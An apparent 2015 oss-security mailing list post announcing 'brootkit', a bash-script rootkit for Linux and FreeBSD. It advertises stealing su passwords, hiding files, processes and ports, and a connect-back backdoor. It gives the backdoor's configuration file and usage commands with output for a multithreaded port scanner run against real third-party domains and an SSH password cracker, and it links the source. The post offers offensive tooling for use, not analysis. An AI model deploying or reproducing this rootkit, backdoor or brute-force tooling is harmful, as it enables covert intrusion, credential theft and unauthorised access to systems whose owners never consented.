Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAEQi4bf0RO9HymKJhD5M9c0wDv2ZhOwG86hU6JFdsOpKwowd6Q@mail.gmail.com>
Date: Sat, 28 Mar 2015 19:36:05 +0800
From: wzt wzt <wzt.wzt@...il.com>
To: oss-security@...ts.openwall.com
Subject: New Rootkit - Lightweight rootkit implemented by bash shell scripts v0.10

BROOTKIT
    Lightweight rootkit implemented by bash shell scripts v0.10

    by wzt 2015   wzt.wzt@...il.com

    If bash shell scripts can be designed for security tools like chkrootkit
    or rkhunter, so it can be implemented for a rootkit.

FEATURES
    1. more hidable ability against admintrator or hids.
    2. su passwd thief.
    3. hide file and directorys.
    4. hide process.
    5. hide network connections.
    6. connect backdoor.
    7. multi thread port scanner.
    8. http download.
    9. multi thread ssh passwd crack.

TARGET OS
    1. centos
    2. rhel
    3. ubuntu
    4. debian
    5. fedroa
    6. freebsd

TODO
    1. sudo thief support.

INSTALL

    Linux distribution systems.

    1. edit br.conf first

      brootkit config file.

      #the ports will be hide: port1,port2,...,portn.
      HIDE_PORT               8080,8899
      #the files will be hide: file1,file2,...,filen.
      HIDE_FILE               br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
      #the process will be hide: process1,process2,...,processn.
      HIDE_PROC               bashbd,brootkit,pty.spawn,brdaemon
      #the connect back host domain name or ip address.
      REMOTE_HOST             localhost
      #the connect back host port.
      REMOTE_PORT             8080
      #the connect backdoor base sleep time.
      SLEEP_TIME              60
    2. ./install.sh

    3. multi thread port scanner.

      [root@...alhost brootkit]$ ./brscan.sh
      ./brscan.sh <-p> [-n|-t|-o|-h] <remote_host>

      option:
      -p              ports, pattern: port1,port2,port3-port7,portn...
      -n              thread num, defalut is 10
      -t              timeout, default is 30s
      -o              results write into log file, default is brscan.log
      -h              help information.

      exp:
      ./brscan.sh -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org
      ./brscan.sh -p 1-65525 -n 200 -t 20 www.cloud-sec.org

      [root@...alhost brootkit]# ./brscan.sh -p 21,22,23-25,80,135-139,8080
-t 5 -n 20 www.wooyun.org
      host: www.wooyun.org | total ports: 10 | thread num: 10 timeout: 5 |
logfile: brscan.log

      thread<0    >           --              pid <57053>     -->     21
      thread<1    >           --              pid <57054>     -->     22
      thread<2    >           --              pid <57055>     -->     23
      thread<3    >           --              pid <57056>     -->     24
      thread<4    >           --              pid <57057>     -->     80
      thread<5    >           --              pid <57058>     -->     135
      thread<6    >           --              pid <57059>     -->     136
      thread<7    >           --              pid <57060>     -->     137
      thread<8    >           --              pid <57061>     -->     138
      thread<9    >           --              pid <57070>     -->     8080

      [>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]
10/10     6 s

    www.wooyun.org: 80

    4. multi thread ssh passwd crack.
      [root@...alhost brootkit]# ./sshcrack.sh
      ./sshcrack.sh <-h host> <-u user> <-p passwd> [-t timeout] [-n
threadnum] [-o logfile]

      option:
      -h              host name or host list file.
      -u              user name or user list file.
      -p              single passwd or passwd list file.
      -t              connect timeout, defalut is 5s.
      -n              thread num, default is 1.
      -o              log file.
      -v              display help information.

      exp:

      ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst
      ./sshcrack.sh -h 192.168.215.148 -u wzt -p passwd.lst -n 10 -t 2
      ./sshcrack.sh -h 192.168.215.148 -u user.lst -p passwd.lst -n 10 -t 2
      ./sshcrack.sh -h host.lst -u user.lst -p passwd.lst -n 10 -t 2

      [root@...alhost brootkit]# ./sshcrack.sh -h 192.168.215.148 -u wzt -p
passwd.lst -n 6
      host: 1 | users: 1 | passwd: 28 thread: 6 | timeout: 10 | logfile:
sshcrack.log

      Thread[ 1]      wzt@....168.215.148             ==>     [e
    ]      [failed]         3
      Thread[ 2]      wzt@....168.215.148             ==>     [a
    ]      [failed]         3
      Thread[ 3]      wzt@....168.215.148             ==>     [d
    ]      [failed]         3
      Thread[ 4]      wzt@....168.215.148             ==>     [giveshell
 ]      [success]     6
      Thread[ 5]      wzt@....168.215.148             ==>     [123456
 ]      [failed]         3
      Thread[ 6]      wzt@....168.215.148             ==>     [fd
   ]      [failed]         3

      waiting all threads to finsh...

    Freebsd system
    on the modern freebsd system, root use csh by default, the other users
    use sh default. this version brootkit can only support sh based
features.

    1. edit brsh.conf first

    brshootkit config file, only one argument support.

      #the port will be hide.
      HIDE_PORT               8080
      #the files will be hide file.
      HIDE_FILE               brsh
      #the process will be hide process.
      HIDE_PROC               sh
      #the connect back host domain name or ip address.
      REMOTE_HOST             localhost
      #the connect back host port.
      REMOTE_PORT             8080
      #the connect backdoor base sleep time.
      SLEEP_TIME              60
    2. ./install.sh

SOURCE
    https://github.com/cloudsec/brootkit

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.